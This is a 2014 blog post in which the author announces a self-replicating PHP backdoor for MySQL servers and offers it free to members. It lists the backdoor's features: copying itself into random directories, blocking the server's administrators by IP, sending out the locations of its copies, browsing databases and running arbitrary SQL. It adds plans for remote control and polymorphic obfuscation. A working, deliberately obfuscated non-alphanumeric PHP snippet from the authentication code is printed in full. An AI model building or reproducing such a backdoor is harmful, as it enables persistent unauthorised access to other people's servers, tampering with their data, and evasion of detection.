Monday, June 16, 2014

Semi-nonalphanumeric & Self-Replicating Database Backdoor/Modifier

DstcvfO.png

Introduction:



This is a release of my latest work. I've written a self-spreading backdoor script with nothing more but symbols (meaning without alpha or numeric values) for databases. Currently, it includes only MySQL db servers but I'll enlarge the scope of its abilities in the near future.

Features Of The Backdoor:



• Self-replication
- copying itself in random directories throughout the server it's been uploaded to
• Authentication for access
- basic authentication system to justify the name of the script
• Restriction of internal REMOTE_ADDRs
- restricting the access of those who handle and manage the server
• Logging and sending out replications' locations
- we do need to know where it had replicated itself in order to access it
• Database browser
- enabling us to view the content and records within the available databases
• Arbitrary SQL execution
- enabling us to modify the content and records within the available databases

Future Features:



• Usage of anonymous functions without preassigned temporary name - Starfall hit me with this idea
• Self-destruction and remote control
- just for the sake of control
• Complete non-alphanumeric content
- NAN-ing the conditional statements (loops)
• MsSQL, Oracle, PostgreSQL, Sybase, Firebird databases handling
- because we never know what the server is running
• Polymorphic obfuscation class to go through the source and parse it through an obfuscation algorithm
- to make the source harder to read in addition

Construction:



The backdoor consists of two main files. The script itself and the authentication form. Aside from that, the replication copies are with a forced .php extension, of course and with an indefinite amount of replications. The others are just .txt files for the storage of their locations. The entire backdoor is written in PDO (PHP Data Objects) due to the deprecation of some of the functions for MySQL in PHP5.5+ and security measures. It is semi-nonalphanumeric due to the fact that I have NANed only the MySQL queries in case there is a sort of detection or an IDS. However, the entire authentication system and SQL execution script are completely non-alphanumeric with the exception of foreach() and if() loops. During the process of coding, I have made a separate project to handle my inputs and convert alpha and numeric values to symbols using the XOR operation in PHP. That can be witnessed on my website - http://keeperax.netai.net/Antagonism/NANGenerator.php. There is additional obfuscation within the declaration/definition of variables using Kanji symbols, Hepburn romanization system and particially alt-codes.

A small preview (part of the authentication system) is presented below:

<?php $_?=(":"^"_").('-'^'_').('-'^'_').("/"^"@").('-'^'_').'_'.('-'^'_').(":"^"_").((','^'~')^'"').("/"^"@").('-'^'_').("+"^"_").("@"^")").("."^"@").(']'^':');$_??=(("."^"`")^"~");$_?($_??);$__=("#"^"|").("."^"~").("/"^"`").("|"^"/").("{"^"/");$_=('*'^'_').(','^'_').(":"^"_").('-'^'_').("."^"@").(">"^"_").('-'^'@').(":"^"_");$___=('*'^'_').(','^'_').(":"^"_").('-'^'_');$____=((','^'~')^'"').(">"^"_").(','^'_').(','^'_');$_=${$__}[$___];$__=${$__}[$____];$_…=('='^'_').('>'^'_').('<'^'_').('+'^'@').('$'^'@').('/'^'@').('/'^'@').('-'^'_').'_'.('*'^'_').(','^'_').(':'^'_').('-'^'_').(('-'^'|')^'`');$__…=('='^'_').('>'^'_').('<'^'_').('+'^'@').('$'^'@').('/'^'@').('/'^'@').('-'^'_').'_'.((','^'~')^'"').(">"^"_").(','^'_').(','^'_').(('-'^'|')^'`');$__=("#"^"|").('-'^'~').('%'^'`').('-'^'~').('-'^'~').(')'^'`').(("]"^":")^"(").("."^"`");$__……=("@"^"(").(":"^"_").(">"^"_").("$"^"@").(":"^"_").('-'^'_');$___……=("@"^")").(','^'_').(","^"`").("/"^"@").(']'^':').(']'^':').(":"^"_").("$"^"@");$_•=(','^'_').(":"^"_").(','^'_').(','^'_').("@"^")").("/"^"@").("."^"@").'_'.(','^'_').("+"^"_").(">"^"_").('-'^'_').("+"^"_");$_•();$_••=(","^"`").("/"^"@").('<'^'_').(">"^"_").("+"^"_").("@"^")").("/"^"@").("."^"@").':'." ".('='^'_').(">"^"_").('<'^'_').('+'^'@').("$"^"@").("/"^"@").("/"^"@").('-'^'_').'.'.((','^'~')^'"').("@"^"(").((','^'~')^'"');if(isset($__)&&isset($_)){if($__==$__…&&$_==$_…){$__……($_••);${$__}[$___……] = ("+"^"_").('-'^'_').('*'^'_').(":"^"_");}}?>

Both the backdoor script and generator of non-alphanumeric values will be handed to all members without exception free of charge. Note that I will be giving away only the NANed copies of them both so do not PM to ask me of the 'clean' and plainly readable source.

0 comments:

Post a Comment